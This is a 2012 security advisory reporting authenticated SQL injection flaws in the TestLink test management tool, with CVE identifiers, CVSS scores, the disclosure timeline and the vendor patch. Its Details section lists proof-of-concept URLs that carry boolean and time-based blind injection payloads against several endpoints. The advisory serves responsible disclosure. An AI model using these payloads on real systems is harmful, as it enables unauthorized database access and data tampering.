------------------
Information
------------------
Name: SQL Injection Vulnerabilities in TestLink
Software tested: TL v1.8.5b & checked in v1.9.3 (prior version may be
affected)
Vendor Homepage: https://www.teamst.org
Vendor Notification: 27 January 2012
Vendor Patch: 4 February 2012
Public Disclosure: 20 February 2012
CVE: CVE-2012-0938 & CVE-2012-0939
Solution Status: Fixed by Vendor


------------------
Description
------------------
TestLink is a web based test management and test execution system. It
enables quality assurance teams to create and manage their test cases as
well as to organize them into test plans. These test plans allow team
members to execute test cases and track test results dynamically.

TestLink is a GPL licensed open source project.


------------------
Details
------------------
CVE-2012-0938:
TestLink v1.8.5b & 1.9.3 are affected by some SQL Injection
vulnerabilities (other versions also maybe affected).
To successfully exploit these vulnerabilities, a remote attacker must
login with a valid user account. Some cases need a different role to be
exploited.
CVSS v2: 6.5
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
Example PoC URLs are:

https://example.com/lib/ajax/getrequirementnodes.php?root_node=1 OR 1=1
https://example.com/lib/ajax/gettprojectnodes.php?root_node=4 OR 1=1
https://example.com/lib/cfields/cfieldsEdit.php?do_action=edit&cfield_id=1 AND
3653=BENCHMARK(5000000,MD5(1))
https://example.com/lib/plan/planMilestonesEdit.php?doAction=edit&id=7
AND 5912=BENCHMARK(5000000,MD5(1))
https://example.com/lib/plan/planMilestonesEdit.php?doAction=create&tplan_id=2623
AND 5912=BENCHMARK(5000000,MD5(1))
https://example.com/lib/requirements/reqEdit.php?doAction=create&req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
https://example.com/lib/requirements/reqImport.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))

CVE-2012-0939:
TestLink v1.8.5b is affected by some SQL Injection vulnerabilities
(other versions also maybe affected).
To successfully exploit these vulnerabilities, a remote attacker must
login with a valid user account. Some cases need a different role to be
exploited.
CVSS v2: 6.5
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
Example PoC URLs are:

https://example.com/lib/requirements/reqSpecAnalyse.php?req_spec_id=2622
OR 1=1
https://example.com/lib/requirements/reqSpecPrint.php?req_spec_id=2622
AND 5912=BENCHMARK(5000000,MD5(1))
https://example.com/lib/requirements/reqSpecView.php?req_spec_id=2622 AND
5912=BENCHMARK(5000000,MD5(1))


------------------
Solution
------------------
The vendor fixed these vulnerabilities in a patch for version 1.9.3.
Please see the references.


------------------
References
------------------
Vendor URL / Patch : https://mantis.testlink.org/view.php?id=4906
CVE-2012-0938: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0938
CVE-2012-0939: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0939


------------------
Credits
------------------
Researcher: Juan M. Natal
Company: INTECO (https://www.inteco.es)
Contact: jnatal [at] cert [dot] inteco [dot] es

Thanks to: J. Valentin Gutierrez (@vnico) & Juan C. Montes (@jcmontes_tec)


------------------
Disclaimer
------------------
The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be
updated in order to provide as accurate information as possible.